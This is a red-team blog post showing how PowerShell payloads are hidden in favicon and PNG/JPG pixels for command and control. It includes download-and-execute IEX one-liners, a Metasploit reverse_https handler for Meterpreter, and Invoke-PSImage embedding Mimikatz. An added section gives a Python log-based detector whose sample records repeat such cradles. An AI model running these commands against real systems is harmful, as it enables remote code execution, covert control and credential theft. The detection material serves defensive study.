Penetration Testing Lab
Articles from the Pentesting Field

Command and Control – Images
January 2, 2018
netbiosX | Red Team C2, Command and Control, Red Team
Images have traditionally been used as a method of hiding a message. For forensic investigators, searching for evidence inside that type of file is possibly the oldest trick in the book. In offensive security and red teaming, however, pictures can hide commands, payloads and scripts.

Michael Scott developed a Python script which can generate an icon image and embed a PowerShell command into it. The first step is to write the command into a text file.
echo 'IEX((new-object net.webclient).downloadstring("http://19
Favicon – Embedded Command
The next step is to create the favicon that will contain the embedded payload, start the Apache web server and move the icon into the web server directory.
python create_favicon.py shellcode.txt evil.png
service apache2 start
mv evil.png /var/www/favicon.ico
Generation of Favicon
The Metasploit module multi/handler can be used to receive the connection once the command is executed on the target host.
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST XXX.XXX.XXX.XXX
set LPORT 443
Metasploit – Multi Handler Module for Favicon
The Get-FaviconText PowerShell script downloads the icon into a temporary directory and converts the pixels back into characters in order to execute the payload command.
Import-Module .\readFavicon.ps1
Get-FaviconText -URL http://192.168.1.171/favicon.ico -WriteTo
Implant – Favicon Configuration
The Get-FaviconText script is actually the implant that needs to be executed on the target. Even if permissions to access this file have not been set on the web directory, the payload command inside the icon will still run.
Implant – Favicon
A Meterpreter session will open and the target can be controlled through Metasploit.
Meterpreter via Favicon
However, it is also possible to use other types of images such as JPG to embed not just commands but full PowerShell scripts, in order to perform various other post-exploitation activities. Barrett Adams developed a PowerShell module that can use the pixels of a PNG file to embed a PowerShell script. This module will also generate a one-liner command for execution:
Import-Module .\Invoke-PSImage.ps1
Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\77.jpg
Embedding Mimikatz in PNG – Web Version
Executing the one-liner will run Mimikatz from a PNG file that is stored on a web server.
Mimikatz via PNG over the Web
Alternatively, this script can generate a one-liner for an image that is hosted locally.
Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\77.jpg
Embedding Mimikatz in PNG – Local Version
Running the command will execute Mimikatz from the PNG file.
Mimikatz via PNG – Local
Conclusion
Images can be used to execute shellcode and scripts and to perform other activities. There is a limit on the number of characters that can be embedded, so only images with a lot of pixels can carry a script. It is an interesting method of hiding payloads in plain sight, and a type of threat that could be prevented if PowerShell was disabled across the network.
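Where PowerShell cannot be disabled, script block logging still records the text the implant runs, and that is where the favicon and PSImage loaders described above can be caught. The following is an added example, not code from this post or from the et0x/C2 or Invoke-PSImage projects: it scores PowerShell script-block text (the shape of Event ID 4104 ScriptBlockText) for the combination the post describes, an image fetched over HTTP, its pixels read back out, and the recovered text executed. The indicator regexes and the log records are constructed assumptions; only the 192.168.1.171 host comes from the post.

```python
"""Heuristic detector for image-borne PowerShell payload loaders (added example)."""
import re

# One indicator group per stage of the pixel-to-script technique. These are
# assumptions about how such loaders commonly look, not a tool-specific signature.
INDICATORS = {
    "fetch":   re.compile(r"net\.webclient|invoke-webrequest|downloadstring|downloaddata|openread", re.I),
    "image":   re.compile(r"https?://\S+?\.(?:ico|png|jpe?g|gif|bmp)\b", re.I),
    "pixels":  re.compile(r"System\.Drawing\.Bitmap|\.GetPixel\(|LockBits", re.I),
    "execute": re.compile(r"\bIEX\b|Invoke-Expression|\[scriptblock\]::Create", re.I),
}

# Constructed sample records in the shape of Event ID 4104 ScriptBlockText.
SAMPLE_RECORDS = [
    {"id": 1, "ScriptBlockText":
        'IEX((new-object net.webclient).downloadstring("http://192.168.1.171/favicon.ico"))'},
    {"id": 2, "ScriptBlockText":
        'Add-Type -A System.Drawing;$g=New-Object System.Drawing.Bitmap((New-Object Net.WebClient)'
        '.OpenRead("http://192.168.1.171/77.png"));for($x=0;$x -lt $g.Width;$x++){$p=$g.GetPixel($x,0)'
        ' ... };IEX($decoded)'},
    {"id": 3, "ScriptBlockText":  # benign: local image conversion, nothing fetched or executed
        'Add-Type -AssemblyName System.Drawing;$b=New-Object System.Drawing.Bitmap("C:\\temp\\logo.png");'
        '$b.Save("C:\\temp\\logo.jpg")'},
    {"id": 4, "ScriptBlockText":  # benign: plain image download, no pixel decoding, no execution
        '(New-Object Net.WebClient).DownloadFile("http://192.168.1.171/logo.png","C:\\temp\\logo.png")'},
]

def score_script_block(text):
    """Return the set of indicator groups present in one script block."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}

def is_suspicious(text):
    """Flag a block when pixel reading is paired with a fetch or an execution
    (the decoding loop), or when text pulled from an image URL is executed
    (the favicon-style cradle). A lone Bitmap call or a plain download is not enough."""
    hits = score_script_block(text)
    decoder = "pixels" in hits and bool(hits & {"fetch", "execute"})
    cradle = {"image", "execute"} <= hits
    return decoder or cradle

def scan_records(records):
    """Return [(record_id, sorted indicator names)] for the records that are flagged."""
    return [(r["id"], sorted(score_script_block(r["ScriptBlockText"])))
            for r in records if is_suspicious(r["ScriptBlockText"])]

if __name__ == "__main__":
    for rec_id, hits in scan_records(SAMPLE_RECORDS):
        print(f"record {rec_id}: suspicious ({', '.join(hits)})")
```

In practice the records would come from the Microsoft-Windows-PowerShell/Operational log, and the two benign samples show the rule tolerating ordinary image handling.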
References
https://github.com/et0x/C2
http://rwnin.net/?p=35
https://github.com/peewpw/Invoke-PSImage